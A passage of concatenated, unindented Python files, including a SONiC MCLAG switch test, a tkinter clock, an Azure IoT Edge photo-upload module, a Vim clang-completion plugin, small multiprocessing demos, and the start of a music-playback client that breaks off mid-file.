# sync check on dut1 orphan ports
for dut_port, ptf_port in zip(dut1_orphan_ports, g_vars['dut1_orphan_ports']):
if t == "mac":
dut_res = [line.split()[2] for line in dut1_entry_res if dut_port in line]
peer_res = [line.split()[2] for line in dut2_entry_res if g_vars['peer_link_interface'] in line]
ptf_entry = res['eth{}'.format(ptf_port)].values()
else:
dut_res = [line.split()[0] for line in dut1_entry_res if dut_port in line]
peer_res = [line.split()[0] for line in dut2_entry_res if g_vars['peer_link_interface'] in line]
ptf_entry = res['eth{}'.format(ptf_port)].keys()
dut_entry = ["".join(entry.split(":")).lower() for entry in dut_res]
peer_entry = ["".join(entry.split(":")).lower() for entry in peer_res]
random_entry = set(random.sample(ptf_entry, random_check_num))
assert random_entry <= set(dut_entry), "{} on dut1 {} should match servers on ptf eth{}".format(t, dut_port, ptf_port)
assert random_entry <= set(peer_entry), "{} learned from active orphan port {} should point to peer link on standby".format(t, dut_port)
# sync check on dut2 orphan ports
for dut_port, ptf_port in zip(dut2_orphan_ports, g_vars['dut2_orphan_ports']):
if t == "mac":
dut_res = [line.split()[2] for line in dut2_entry_res if dut_port in line]
peer_res = [line.split()[2] for line in dut1_entry_res if g_vars['peer_link_interface'] in line]
ptf_entry = res['eth{}'.format(ptf_port)].values()
else:
dut_res = [line.split()[0] for line in dut2_entry_res if dut_port in line]
peer_res = [line.split()[0] for line in dut1_entry_res if g_vars['peer_link_interface'] in line]
ptf_entry = res['eth{}'.format(ptf_port)].keys()
dut_entry = ["".join(entry.split(":")).lower() for entry in dut_res]
peer_entry = ["".join(entry.split(":")).lower() for entry in peer_res]
random_entry = set(random.sample(ptf_entry, random_check_num))
assert random_entry <= set(dut_entry), "{} on dut2 {} should match servers on ptf eth{}".format(t, dut_port, ptf_port)
assert random_entry <= set(peer_entry), "{} learned from standby orphan port {} should point to peer link on active".format(t, dut_port)
# sync check on mclag interfaces
mclag_res = duthost.shell("mclagdctl dump state|grep 'MCLAG Interface'")['stdout']
mclag_intf = natsorted(mclag_res.split(":")[1].strip().split(","))
for intf in mclag_intf:
if t == "mac":
dut1_res = [line.split()[2] for line in dut1_entry_res if intf in line]
dut2_res = [line.split()[2] for line in dut2_entry_res if intf in line]
ptf_entry = res['eth{}'.format(int(intf.strip("PortChannel"))-1)].values()
else:
dut1_res = [line.split()[0] for line in dut1_entry_res if intf in line]
dut2_res = [line.split()[0] for line in dut2_entry_res if intf in line]
ptf_entry = res['eth{}'.format(int(intf.strip("PortChannel"))-1)].keys()
dut1_entry = ["".join(entry.split(":")).lower() for entry in dut1_res]
dut2_entry = ["".join(entry.split(":")).lower() for entry in dut2_res]
random_entry = set(random.sample(ptf_entry, random_check_num))
assert random_entry <= set(dut1_entry), "{} on dut1 {} should match servers on ptf eth{}".format(t, intf, int(intf.strip("PortChannel"))-1)
assert random_entry <= set(dut2_entry), "{} on dut2 {} should match servers on ptf eth{}".format(t, intf, int(intf.strip("PortChannel"))-1)
class TestCase14_CornerTest():
@pytest.fixture(scope="function")
def setup_stop_teamd_on_active(self, duthost):
duthost.shell("systemctl stop teamd")
yield
duthost.shell("systemctl start teamd")
duthost.shell("systemctl start iccpd")
# after teamd restarts, the PortChannels are removed from the kernel bridge, so restart swss to recover
duthost.shell("systemctl restart swss")
wait_until(60, 10, duthost.critical_services_fully_started)
@pytest.fixture(scope="function")
def setup_stop_teamd_on_standby(self, duthost2):
duthost2.shell("systemctl stop teamd")
yield
duthost2.shell("systemctl start teamd")
duthost2.shell("systemctl start iccpd")
duthost2.shell("systemctl restart swss")
wait_until(60, 10, duthost2.critical_services_fully_started)
@pytest.mark.usefixtures("setup_stop_teamd_on_active")
def test_stop_teamd_on_active(self, duthost, ptfhost, testbed):
assert wait_until(100, 10, check_teamd_status, ptfhost, ptf=True, base=0, select=False), \
"Server port attached to active device should be deselected after active device stopped teamd"
time.sleep(30)
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut2_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": g_vars['dut1_link_server_interfaces']
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
def test_start_teamd_on_active(self, duthost, ptfhost, testbed):
assert wait_until(100, 10, check_teamd_status, ptfhost, ptf=True, base=0, select=True), \
"Server port attached to active device should be selected after active device starts teamd"
time.sleep(30)
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
@pytest.mark.usefixtures("setup_stop_teamd_on_standby")
def test_stop_teamd_on_standby(self, duthost2, ptfhost, testbed):
assert wait_until(100, 10, check_teamd_status, ptfhost, ptf=True, base=len(g_vars['dut1_all_interfaces']), select=False), \
"Server port attached to standby device should be deselected after standby device stopped teamd"
time.sleep(30)
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": g_vars['dut2_link_server_interfaces']
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
def test_start_teamd_on_standby(self, duthost2, ptfhost, testbed):
assert wait_until(100, 10, check_teamd_status, ptfhost, ptf=True, base=len(g_vars['dut1_all_interfaces']), select=True), \
"Server port attached to standby device should be selected after standby device starts teamd"
time.sleep(30)
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
|
functions.py
|
from math import sin
from math import cos
import math
from tkinter import *
from time import sleep
import time
# import sched, time
import threading
import GUI
act = False
alpha = 0
def lines_move(tk, canvas1, line1, line2, line3):
global alpha
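# Hand angles in degrees: line1 advances 6 degrees per call (alpha), while
# line2 and line3 rotate 60x and 3600x slower, clock-hand style.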
x2 = 100 * sin(math.radians(alpha))
y2 = 100 * cos(math.radians(alpha))
x4 = 100 * sin(math.radians(alpha / 60))
y4 = 100 * cos(math.radians(alpha / 60))
x6 = 80 * sin(math.radians(alpha / 3600))
y6 = 80 * cos(math.radians(alpha / 3600))
canvas1.coords(line1, 150, 200, (150 + x2), (200 - y2))
canvas1.coords(line2, 150, 200, (150 + x4), (200 - y4))
canvas1.coords(line3, 150, 200, (150 + x6), (200 - y6))
tk.update_idletasks()
tk.update()
alpha = alpha + 6
# print(str(alpha) + ", " + str(150 - x2) + ", " + str(200 - y2))
sleep(1)
def time_start(tkint, canv, l1, l2, l3):
global act
act = True
while act:
# run one animation step per iteration; lines_move() itself sleeps for 1s
t1 = threading.Thread(target=lines_move, args=(tkint, canv, l1, l2, l3))
# t2 = threading.Thread(target=GUI.run_app())
t1.start()
t1.join()
# t2.start()
def time_stop():
global act
act = False
def switch_frames(frame1, frame2):
frame1.place_forget()
frame2.place(x=0, y=0)
|
main.py
|
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE file in the project root for
# full license information.
import time
import os
import sys
import asyncio
from six.moves import input
import threading
from azure.iot.device import IoTHubModuleClient, MethodResponse, Message
from blobfileuploader import BlobFileUploader
import cv2
import datetime
BLOB_ON_EDGE_MODULE = ""
BLOB_ON_EDGE_ACCOUNT_NAME = ""
BLOB_ON_EDGE_ACCOUNT_KEY = ""
PHOTO_CONTAINER_NAME = ""
PHOTO_DATA_FOLDER = ""
EDGE_DEVICEID = ""
uploadCycleSecKey = "upload_cycle_sec"
uploadCycleSecReportedKey = "current_upload_cycle_sec"
uploadStatusReportedKey = "photo_uploading"
uploadNotifyStatusKey = "photo_upload_notify"
uploadCycleSec = 10
quitFlag = False
uploadStared = False
uploadNotifyStatus = False
uploadNotifyOutputName = "upload_notification"
def updateReportedTwin(module_client):
global uploadCycleSec, uploadStared, uploadCycleSecReportedKey, uploadStatusReportedKey
reported = {
uploadCycleSecReportedKey: uploadCycleSec,
uploadStatusReportedKey: uploadStared
}
module_client.patch_twin_reported_properties(reported)
async def main(videoPath, fileUploader):
global uploadCycleSecKey, uploadCycleSec, quitFlag
try:
if sys.version_info < (3, 5, 3):
raise Exception( "The sample requires python 3.5.3+. Current version of Python: %s" % sys.version )
print ( "IoT Hub Client for Python" )
# The client object is used to interact with your Azure IoT hub.
module_client = IoTHubModuleClient.create_from_edge_environment()
# connect the client.
module_client.connect()
currentTwin = module_client.get_twin()
dtwin = currentTwin['desired']
if uploadCycleSecKey in dtwin:
uploadCycleSec = dtwin[uploadCycleSecKey]
updateReportedTwin(module_client)
# define behavior for receiving desired property patches
def twin_patch_listener(module_client, param_lock):
global uploadCycleSec
print("twin patch listener started.")
while True:
data = module_client.receive_twin_desired_properties_patch() # blocking call
print("Received desired properties updated.")
if uploadCycleSecKey in data:
param_lock.acquire()
uploadCycleSec = data[uploadCycleSecKey]
param_lock.release()
print("Updated {}={}".format(uploadCycleSecKey, uploadCycleSec))
updateReportedTwin(module_client)
param_lock.acquire()
isBreak = quitFlag
param_lock.release()
if isBreak:
print("twin patch listener will be finished")
break
async def upload_photo_handler(videoPath, uploader, module_client, param_lock):
global PHOTO_DATA_FOLDER, uploadCycleSec, uploadStared, uploadNotifyOutputName, uploadNotifyStatus
await uploader.initialize()
print("upload photo handler started.")
try:
print("creating VideoStream")
# cap = cv2.VideoStream(int(videoPath))
cap = cv2.VideoCapture(int(videoPath))
print("...Created")
time.sleep(1)
if cap.isOpened():
print("VideoCapture has been opened")
else:
print("VideoCapture has not been opened")
while True:
param_lock.acquire()
sleepTime = uploadCycleSec
isUpload = uploadStared
isNotify = uploadNotifyStatus
param_lock.release()
time.sleep(sleepTime)
if isUpload:
now = datetime.datetime.now()
photoFileName = 'photo-{0:%Y%m%d%H%M%S%f}'.format(now) + '.jpg'
filename = os.path.join(PHOTO_DATA_FOLDER, photoFileName)
print("Try to take photo - name={}".format(filename))
ret, frame = cap.read()
cv2.imwrite(filename, frame)
print("Saved photo file")
await uploader.uploadFile(filename)
os.remove(filename)
if isNotify:
notifyMsg = "{\"timestamp\":\"%s\",\"filename\":\"%s\"}"
msg = notifyMsg % (datetime.datetime.utcnow().isoformat(), photoFileName)
sendMsg = Message(msg)
module_client.send_message_to_output(sendMsg, uploadNotifyOutputName)
else:
print("Waiting for start")
param_lock.acquire()
isBreak = quitFlag
param_lock.release()
if isBreak:
print("upload photo handler will be finished")
break
except Exception as error:
print('upload photo handler exception - {}'.format(error))
def direct_method_listener(module_client, param_lock):
global uploadStared, uploadNotifyStatus
while True:
try:
print("waiting for method invocation...")
methodRequest = module_client.receive_method_request()
print("received method invocation - '{}'({})".format(methodRequest.name, methodRequest.payload))
response = {}
response_status = 200
if methodRequest.name == "Start":
response['message'] ="Upload started."
param_lock.acquire()
uploadStared = True
if methodRequest.payload is not None:
if uploadNotifyStatusKey in methodRequest.payload:
uploadNotifyStatus = methodRequest.payload[uploadNotifyStatusKey]
else:
response['message'] = "payload should be '{\"" + uploadNotifyStatusKey + "\": true|false}'"
param_lock.release()
print("Received - Start order")
if uploadNotifyStatus:
print(" with notification")
updateReportedTwin(module_client)
elif methodRequest.name == "Stop":
param_lock.acquire()
uploadStared = False
param_lock.release()
response['message'] ="Upload stopped."
print("Received - Stop order")
updateReportedTwin(module_client)
else:
response['message'] = "bad method name"
response_status = 404
print("Bad Method Request!")
except Exception as error:
print("exception happens - {}".format(error))
response['message'] = "Exception - {}".format(error)
methodResponse = MethodResponse(methodRequest.request_id, response_status, payload=response)
module_client.send_method_response(methodResponse)
param_lock = threading.Lock()
twinThread = threading.Thread(target=twin_patch_listener, args=(module_client, param_lock))
twinThread.daemon = True
twinThread.start()
methodThread = threading.Thread(target=direct_method_listener, args=(module_client, param_lock))
methodThread.daemon = True
methodThread.start()
# uploadPhotoThread = threading.Thread(target=upload_photo_handler, args=(videoPath, fileUploader, param_lock))
# uploadPhotoThread.daemon = True
# uploadPhotoThread.start()
# Schedule task for Photo Uploader
listeners = asyncio.gather(upload_photo_handler(videoPath, fileUploader, module_client, param_lock))
print ( "The sample is now waiting for direct method and desired twin update. ")
def stdin_listener():
global quitFlag
while True:
try:
selection = input("Press Q to quit\n")
if selection == "Q" or selection == "q":
print("Quitting...")
param_lock.acquire()
quitFlag = True
param_lock.release()
break
except:
time.sleep(10)
# Run the stdin listener in the event loop
loop = asyncio.get_event_loop()
user_finished = loop.run_in_executor(None, stdin_listener)
# Wait for user to indicate they are done listening for messages
await user_finished
# Cancel listening
listeners.cancel()
# uploadPhotoThread.join()
methodThread.join()
twinThread.join()
# Finally, disconnect
module_client.disconnect()
except Exception as e:
print ( "Unexpected error %s " % e )
raise
if __name__ == "__main__":
BLOB_ON_EDGE_MODULE = os.environ['BLOB_ON_EDGE_MODULE']
BLOB_ON_EDGE_ACCOUNT_NAME = os.environ['BLOB_ON_EDGE_ACCOUNT_NAME']
BLOB_ON_EDGE_ACCOUNT_KEY = os.environ['BLOB_ON_EDGE_ACCOUNT_KEY']
PHOTO_CONTAINER_NAME=os.environ['PHOTO_CONTAINER_NAME']
PHOTO_DATA_FOLDER = os.environ['PHOTO_DATA_FOLDER']
EDGE_DEVICEID = os.environ['IOTEDGE_DEVICEID']
fileUploader = BlobFileUploader(BLOB_ON_EDGE_MODULE, BLOB_ON_EDGE_ACCOUNT_NAME, BLOB_ON_EDGE_ACCOUNT_KEY, PHOTO_CONTAINER_NAME, EDGE_DEVICEID)
loop = asyncio.get_event_loop()
loop.run_until_complete(main('0', fileUploader))
loop.close()
|
yoda_vim.py
|
### import {{{1
import re, os, sys, threading, collections
import vimpy
import config_manager
import snippet_manager
### compatibility of python 2 and 3 ### {{{1
if vimpy.py_version >= 3:
# in python 3 we must add the module dir to sys.path.
yoda_dir = os.path.join( os.path.dirname(__file__), 'yoda' )
assert os.path.exists( yoda_dir )
sys.path.insert( 0, yoda_dir )
import yoda
sys.path.pop( 0 )
else: # python2
from yoda import yoda
### vim state ###{{{1
class _State( object ):
'''\
State object that manages the vim status and threading, and validates
requests for the index.
'''
def __init__( self ):
self._lock = threading.Lock()
self._fatal_message = ''
self.complete_start = 0
self.config_manager = config_manager.ConfigManager()
self.snippet_manager = snippet_manager.SnippetManager()
self.interfaces = []
self.includes_of_filenames = collections.defaultdict( set )
self.completions = None
### initialize ###
def Init( self ):
self.config_manager.Init( Vim.Get( 'g:yoda_config_basename' ),
Vim.Get( 'g:yoda_config_funcname' ) )
try:
self.snippet_manager.Init( Vim.Get( 'g:yoda_snippet_engine' ) )
except ImportError as e:
EchoHL( 'ModeMsg', str(e) )
### manage buffer ###
def IsValid( self, silent=False ):
def echohl( msg ):
if not silent: EchoHL( 'ModeMsg', msg )
flags = self.config_manager.CompilationFlags( Vim.FileName )
if None is Index:
echohl( 'Completion is OFF.' )
return False
elif None is flags:
echohl( 'No compilation flags found. '
'To give clang compilation flags, see :help yoda-quick-start.' )
return False
elif self._fatal_message:
echohl( self._fatal_message )
self._fatal_message = None
return False
return True
### fatal state ####
def SetFatal( self, message ):
self._fatal_message = message
### threading ###
def Lock( self ):
return self._lock
def IsParsing( self ):
if not self._lock.acquire( False ):
return True
else:
self._lock.release()
return False
### request data ###
def RequestData( self ):
compilation_flags = self.config_manager.CompilationFlags( Vim.FileName )
unsaved_files = [ ( Vim.FileName, Vim.Buffer ) ]
# vim cursor line starts from 1, but its column starts from 0!
return dict(
filename = Vim.FileName,
line_num = Vim.LineNum,
column_num = Vim.ColNum+1,
unsaved_files = unsaved_files,
num_unsaved_flies = len( unsaved_files ),
compilation_flags = compilation_flags,
num_compilation_flags = len( compilation_flags ) )
### autocmd ### {{{1
State = _State()
Index = None
Vim = vimpy.VimPy()
def VimOnAutoLoad():
global Index
try:
library_filename = _FindClangLibrary( Vim.Get( 'g:yoda_clang_library' ) )
if not Vim.Get( 'g:yoda_clang_library' ):
Vim.Set( 'g:yoda_clang_library', library_filename )
State.Init()
if not library_filename:
EchoHL( 'ModeMsg',
'g:yoda_clang_library({}) is not set or is invalid. Disabling completion. '
'See :help yoda-quick-start'.format( library_filename ) )
return 0
yoda.Initialize( library_filename )
Index = yoda.Index.make()
except Exception:
import traceback
EchoHL( 'WarningMsg',
'\n[failed to load clang library]\nreason: {}'.format(
traceback.format_exc() ) )
return 0
return 1
def VimOnFileType( config_param ):
try: # validate configuration file
if not State.config_manager.Register( Vim.FileName, config_param ):
return 0
except Exception as e:
EchoHL( 'ErrorMsg', '\nerrors in configuration file\nreason:\n{}'
.format( str(e) ) )
return 0
if not State.IsValid():
return
if not Vim.Get( 'g:yoda_shutup_when_loaded' ):
EchoHL( 'ModeMsg',
'load configuration file @{}'.format(
State.config_manager.ConfigFileForFileName( Vim.FileName ) ) )
if not State.IsValid():
return 0
_ReparseInBackground( True )
return 1
def VimOnIdle( force ):
return _ReparseInBackground( force )
def _ReparseInBackground( force ):
force = Vim.Get( 'g:yoda_greedy_reparsing' ) or force
if not State.IsValid(silent=True):
return 0
if not force and State.IsParsing():
return 0
### check includes (experimental):
includes = set()
include_rx = re.compile( r'\s*#\s*include\s+[<"](.+)[>"]' )
for line in Vim.BufferAsList:
m = include_rx.match( line )
if m:
includes.add( m.group(1) )
past_includes = State.includes_of_filenames[ Vim.FileName ]
State.includes_of_filenames[ Vim.FileName ] = includes
if not len( past_includes ^ includes ) and not force:
return 0
### create daemon thread to reparse translation unit
def reparse( request_data ):
with State.Lock():
try:
tu = Index.translation_unit( request_data )
tu.reparse( request_data )
except Exception: ### XXX: the exception must be caught!!
import traceback
msg = ('\nerror occurred in "{}" background thread\n'
'reason:').format( '_ReparseInBackground()' )
State.SetFatal( msg + traceback.format_exc() )
request_data = State.RequestData()
update_daemon = threading.Thread( target=reparse, args=( request_data, ) )
update_daemon.daemon = True
update_daemon.start()
return 1
### complete ### {{{1
def CompleteStart():
if not State.IsValid():
return -1
l_line = Vim.Line[ : Vim.ColNum ]
if vimpy.py_version == 2: # TODO: Surrogate pair
l_line = l_line.decode( 'utf-8' )
match = re.search( r'(\w+)$', l_line, re.UNICODE )
State.complete_start = match.start() if match else Vim.ColNum
return State.complete_start
def Complete( base ):
if not State.IsValid():
return []
if State.IsParsing():
EchoHL( 'ModeMsg', 'yoda is still parsing. no completions yet.' )
return []
with State.Lock():
request_data = State.RequestData()
tu = Index.translation_unit( request_data )
State.completions = tu.code_completions( request_data )
# reduce completions and convert it into list of vim dicts
completions = State.completions.iterate( base )
completions = _ConvertFilterCompletions( completions, base )
# add completions and check to stop completion periodically.
for i, x in enumerate( completions ):
if i % 10000 == 0: # TODO: improve performance
Vim.Command('sleep 100m')
if Vim.complete_check() != '0':
break
Vim.complete_add( x )
return []
def VimOnCompleteDone():
State.completions = None
### goto ### {{{1
def LocationTo( kind ):
'get location to kind'
if not State.IsValid():
return {}
# dict contains translation unit functions of location kinds.
location_func = dict(
Declaration = lambda tu, req: tu.declaration_location_info( req ),
Definition = lambda tu, req: tu.definition_location_info( req )
)[ kind ]
with State.Lock(): # get location
request_data = State.RequestData()
tu = Index.translation_unit( request_data )
location_info = location_func( tu, request_data )
if not location_info or not location_info.filename:
return {}
# convert location_info to vim dict
return Vim.Py2Vim(
dict(
filename = location_info.filename,
bufnr = Vim.bufnr( location_info.filename ),
lnum = location_info.line_num,
col = location_info.column_num
) )
### diagnostics ### {{{1
def DiagnosticQfList():
'get diagnostic quickfix list of current buffer'
if not State.IsValid():
return []
with State.Lock():
request_data = State.RequestData()
tu = Index.translation_unit( request_data )
diagnostics = tu.diagnostics( request_data )
# converter of diagnostic
def make( diagnostic ):
loc = diagnostic.location_info
return dict(
bufnr = Vim.bufnr( loc.filename, 1 ),
lnum = loc.line_num,
col = loc.column_num,
text = diagnostic.text,
type = diagnostic.kind )
# predicate of diagnostics
def pred( diagnostic ):
if diagnostic.kind in ('E', 'W'):
return True
return False
# filter and map
return Vim.Py2Vim( make( d ) for d in diagnostics if pred( d ) )
### snippet ### {{{1
def ShouldSnip():
'whether current state can snippet'
if not State.IsValid():
return 0
return int( State.snippet_manager.Get().CanSnip() )
def TriggerSnip(): ###
'''
Trigger snippet which is selected completion of placeholder in insert mode.
'''
def divided_by( s, *positions ):
pos = 0
result = []
for p in positions:
assert pos <= p
result.append( s[pos:p] )
pos = p
result.append( s[pos:] )
return tuple( result )
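# e.g. divided_by('abcdef', 2, 4) -> ('ab', 'cd', 'ef')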
if not State.IsValid() or not State.completions: # this will not return 0
return 0
# back up current line for exceptions.
backup_line = Vim.Line
backup_colnum = Vim.ColNum
pre, query, post = divided_by( backup_line, State.complete_start, backup_colnum )
# vim has prepared to get placeholder for query.
completions = State.completions
# search for the first completion candidate that matches the query.
# TODO: c++ function overloads are not supported yet.
completion_info = completions.search( query )
if not completion_info or not completion_info.has_placeholder():
# set the current line without the query, because clang won't return
# completions if a valid candidate is already inserted.
Vim.Line = pre + post
Vim.ColNum = State.complete_start
if _FeedKeysForCompletions( completions, query, pre, post ):
return 1
else:
Vim.Line = backup_line
Vim.ColNum = backup_colnum
return 0
# trigger the placeholder.
placeholder = _FormatPlaceHolder( completion_info.placeholder )
snip = State.snippet_manager.Get()
success = 0
try:
# trigger the snippet. if an exception is raised or it returns 0, restore the
# current line and return 0 (failure); otherwise return 1 (success).
Vim.Line = ''
if snip.Trigger( pre, placeholder, post ):
success = 1
else:
success = 0
except Exception as e:
EchoHL( 'ErrorMsg', str(e) )
finally:
if not success: # an error has occurred. restore the current line
Vim.Line = backup_line
Vim.ColNum = backup_colnum
return success
def _FormatPlaceHolder( placeholder ):
if not Vim.Get( 'g:yoda_snippet_space_in_parenthes' ):
return placeholder
def repl_paren( match ):
p = match.group(1)
return '{} {} {}'.format( p[0], p[1:-1], p[-1] )
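# e.g. '({#int x#})' -> '( {#int x#} )'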
reduced = placeholder
rxs = [ re.compile( r'(\(\{#.*?#\}\))' ), re.compile( r'(<\{#.*?#\}>)' ) ]
for rx in rxs:
reduced = rx.sub( repl_paren, reduced )
return reduced
def _FeedKeysForCompletions( completions, query, pre, post ):
'return True if inserted.'
def cased_next( s, query ):
res = s[ : len( query ) ]
cases = re.split( r'([A-Z][A-Z]*[a-z]*)|(_)', s[ len(res): ] )
for case in [ c for c in cases if c ]:
res += case
break
return ''.join( res )
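# e.g. cased_next('FooBarBaz', 'Foo') -> 'FooBar' (extend the query by the next CamelCase chunk)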
def feedkeys( s ):
Vim.feedkeys( s, 'n' )
# Vim.Line = pre + s + post
# Vim.ColNum = len( pre+s )
left, right = completions.binrange( query )
if left < right \
and completions[ left ].spelling == completions[ right-1 ].spelling:
# only one completions
feedkeys( completions[ left ].spelling )
return True
elif (right-left) >= 2: # two or more completions
keys = cased_next( completions[ left ].spelling, query )
if keys == query or not keys:
return False
else:
feedkeys( keys )
return True
return False
### version ### {{{1
def Description():
if State.IsValid():
EchoHL('ModeMsg',
'\nlibrary @{}\n{}\npython version {}\nflags {}'.format(
Vim.Get('g:yoda_clang_library'),
yoda.Version(),
'.'.join( map( str, sys.version_info ) ),
State.config_manager.CompilationFlags( Vim.FileName ) ) )
### vim helper ### {{{1
def EchoHL( hl, message ):
return Vim.Call( 's:echohl', hl, message )
### find clang library ###{{{1
def _FindClangLibrary( library_path ):
'helper function to find clang library file'
def validate( libpath ):
if libpath and os.path.exists( libpath ):
return libpath
return ''
# platform dependent dynamic library name
import platform
sysname = platform.system()
def lib_basename():
d = dict( Darwin='libclang.dylib', Windows='libclang.dll' )
return d.get( sysname, 'libclang.so' )
if library_path:
library_path = os.path.expanduser( library_path )
if os.path.isdir( library_path ):
library_path = os.path.join( library_path, lib_basename() )
return validate( library_path )
else:
# try to find library using command `llvm-config`.
if Vim.executable( 'llvm-config' ) != '0':
dirname = Vim.system( 'llvm-config --libdir 2>/dev/null' ).strip()
library_path = os.path.join( dirname, lib_basename() )
# try to find library using environment variable $LD_LIBRARY_PATH
elif Vim.Get( '$LD_LIBRARY_PATH' ):
for dirname in Vim.Get( '$LD_LIBRARY_PATH' ).split( os.pathsep ):
libfile = os.path.join( dirname, lib_basename() )
if os.path.exists( libfile ):
library_path = libfile
break
return validate( library_path )
### convert completions ### {{{1
def _ConvertFilterCompletions( completions, query ):
'''
Filter completions by query and convert completions into vim completion
format.
'''
# decide how to reduce the completions
ignorecase = Vim.Get( '&l:ignorecase' )
if ignorecase:
query = query.upper()
starts_with = lambda x, q: x.upper().startswith( q )
else:
starts_with = lambda x, q: x.startswith( q )
# filter and convert completions
def convert( stack, icase ):
result = stack.popleft()
infos = [result.full_info]
while stack:
infos.append( stack.popleft().full_info )
return dict( word = result.spelling,
# abbr = result.syntax_except_return_type,
# menu = result.result_type,
info = '\n'.join( infos ),
menu = result.kind,
dup = 1,
icase = icase )
# collect identical spellings for overloaded c++ functions.
# NOTE: `completions` is supposed to be sorted.
same_spellings = collections.deque()
for x in completions:
spelling = x.spelling
if not starts_with( spelling, query ):
continue
if same_spellings and same_spellings[0].spelling != spelling:
yield convert( same_spellings, ignorecase )
same_spellings.append( x )
if same_spellings:
yield convert( same_spellings, ignorecase )
### set __all__ ### {{{1
__all__ = [
'VimOnAutoLoad',
'VimOnFileType',
'VimOnIdle',
'VimOnCompleteDone',
'CompleteStart',
'Complete',
'LocationTo',
'DiagnosticQfList',
'ShouldSnip',
'TriggerSnip',
'Description',
]
# vim:et:ts=2 sts=2 sw=2
|
bangabandhu.py
|
from expression import *
import time
import multiprocessing
def talk():
say("bangabandhu sheikh mujibur rahman is the father of our nation.")
say("he is the most honourable person of our nation")
p2.start()
time.sleep(0.1)
say("i salute him")
time.sleep(1)
say("i respect him from core of my heart")
time.sleep(1.5)
def move():
changeDegree([3,9,5],[100,0,130])
changeDegree([7],[40])
time.sleep(0.9)
changeDegree([3,5,9], [70,60,90])
changeDegree([7], [30])
time.sleep(1.5)
takePosition()
p2 = multiprocessing.Process(target=move,args=[])
talk()
|
multiprogress.py
|
import time
from multiprocessing import Process,Manager
def subProcess(name, d):
for j in range(100):
time.sleep(0.2)
d['process%d'%name] = j
def showmsg(d):
while 1:
time.sleep(1)
for k in range(5):
print('Process%d:%d%%' % (k, d['process%d' % k]))
if __name__ == '__main__':
d = Manager().dict()
p_list = []
for i in range(5):
p = Process(target=subProcess, args=(i, d))
print('Process %d start.' % i)
p.start()
p_list.append(p)
sm = Process(target=showmsg,args=(d,))
sm.start()
for res in p_list:
res.join()
sm.terminate()
|
playIT_client.py
|
#!/usr/bin/python3
""" The client controller for the playIT backend
by Horv and Eda - 2013, 2014
To add a new type of playback, add a method called _play_TYPE(media_item)
and define how it's handled (see the illustrative sketch after the existing
handlers below). It will be called automatically based on the type parameter
specified in the downloaded JSON.
Requires Python >= 3.3
Depends on:
1. mopidy - for Spotify and Soundcloud playback.
Note that you'll need both the spotify and soundcloud plugins
Eg. aurget -S mopidy mopidy-spotify mopidy-soundcloud
2. python-mpd2 (https://github.com/Mic92/python-mpd2)
3. python-requests (python library) for popping and checking server status.
4. mpv for video/YouTube playback. http://mpv.io/
5. youtube-dl
"""
import threading
import requests
import time
import argparse
import queue
import sys
from shutil import which
import subprocess
import select
# from subprocess import call
from mpd import MPDClient, CommandError
# Some settings and constants
POP_PATH = "/playIT/media/popQueue"
# Use verbose output
VERBOSE = False
MOPIDY_HOST = "localhost"
MOPIDY_PORT = 6600
def main():
""" Init and startup goes here... """
check_reqs()
playit = PlayIt()
vprint("Running main playback loop...")
ploop = threading.Thread(target=playit.start_printloop)
eloop = threading.Thread(target=playit.start_eventloop)
ploop.daemon = True
eloop.daemon = True
ploop.start()
eloop.start()
playit.start_prompt()
def check_reqs():
""" Verify that all dependencies exists. """
depends = ["mopidy", "mpv", "youtube-dl"]
failed = False
for dep in depends:
if which(dep) is None:
print("Requirement", dep, "is missing (from PATH at least...)",
file=sys.stderr)
failed = True
if failed:
print("Resolve the above missing requirements", file=sys.stderr)
exit(1)
else:
if not process_exists("mopidy"):
print("mopidy does not seem to be running.",
"Please launch it beforehand :)",
file=sys.stderr)
exit(2)
def interrupt_main():
from _thread import interrupt_main
interrupt_main()
def mpd_exec(cmd):
""" Executes the command named 'cmd' on a fresh MPD connection """
mpd = MPDClient()
mpd.connect(MOPIDY_HOST, MOPIDY_PORT)
retval = getattr(mpd, cmd)()
mpd.close()
mpd.disconnect()
return retval
def process_exists(proc_name):
""" http://stackoverflow.com/a/7008599 ."""
import re
ps = subprocess.Popen("ps ax -o pid= -o args= ",
shell=True, stdout=subprocess.PIPE)
ps_pid = ps.pid
output = ps.stdout.read()
ps.stdout.close()
ps.wait()
from os import getpid
for line in output.decode().split("\n"):
res = re.findall(r"(\d+) (.*)", line)
if res:
pid = int(res[0][0])
if proc_name in res[0][1] and pid != getpid() and pid != ps_pid:
return True
return False
def _fix_server_address(raw_server):
""" Prepend http:// if it is missing. """
if not raw_server.startswith("http://"):
raw_server = "http://" + raw_server
return raw_server
def check_connection(url):
""" Checks the connection to the backend """
